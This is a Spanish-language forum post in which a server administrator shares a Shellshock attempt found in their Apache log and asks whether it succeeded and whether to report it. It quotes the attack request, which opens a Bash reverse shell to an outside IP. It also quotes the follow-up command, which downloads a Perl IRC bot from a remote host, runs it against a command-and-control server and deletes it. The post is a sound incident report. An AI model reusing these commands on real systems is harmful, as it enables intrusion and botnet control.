Hoy he consultado el access.log de mi Apache para la ahora infame cadena () {
, y además de un montón de lo que parecían pings para verificar cuántos servidores son vulnerables, encontré este intento, que parecía un ataque genuino:
94.23.193.131 - - [26/Sep/2014:05:48:53 +0200] "GET / HTTP/1.0" 200 29271 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
Lo que hice a continuación fue ver lo que hizo la conexión TCP; Caté el resultado de esto:
user@localhost:~# cat < /dev/tcp/195.225.34.101/3333
cat < /dev/tcp/195.225.34.101/3333
wget -O /tmp/.lCE-unix http://202.137.176.146/icons/xt.dat;perl /tmp/.lCE-unix 81.18.135.38 443;rm -rf /tmp/.lCE-unix;uptime
Si lo leo bien, se queda con un script de Perl alojado en http://202.137.176.146/icons/xt.dat
( Copia del script en Pastebin ), lo envía a /tmp/.lCE-unix, lo ejecuta y luego se elimina de nuevo.
Mirando el script en sí, lo que creo que estoy viendo es que intenta conectarse a un servidor IRC en IP 81.18.135.38, puerto 443, usando una contraseña de conexión 45QOhktzhwR4Ai, usuario 'opus', luego intenta unirse canal '## n3' (si tengo razón).
Admito que solo quería compartir esto en algún lugar. Preguntas reales sin embargo:
- El ataque fue manejado por Apache, que probablemente reenvió la solicitud a Wordpress alojado en /, una versión 3.x. No creo que haya sido ejecutado por Bash, pero ¿alguien puede confirmar esto?
- ¿Cómo puedo verificar si el ataque fue exitoso? He ejecutado comandos como netstat y lsof pero no pude encontrar ninguna conexión fuera de lo común, además de mi propia sesión SSH, el servidor web, etc. No hay conexiones a ninguna de las direcciones IP dadas, no hay procesos Perl en ejecución.
- ¿Es esta una hazaña conocida? No pude encontrar mucho en una búsqueda, aunque hay un hilo en la lista de correo de Redhat de 2005, que parece hacer referencia al archivo.
- ¿Debo informar algunas de esas direcciones IP a las autoridades? Y si es así, ¿cuál? Puedo imaginar al FBI y a quienes no les gustaría eliminar el servidor C & C al que se hace referencia.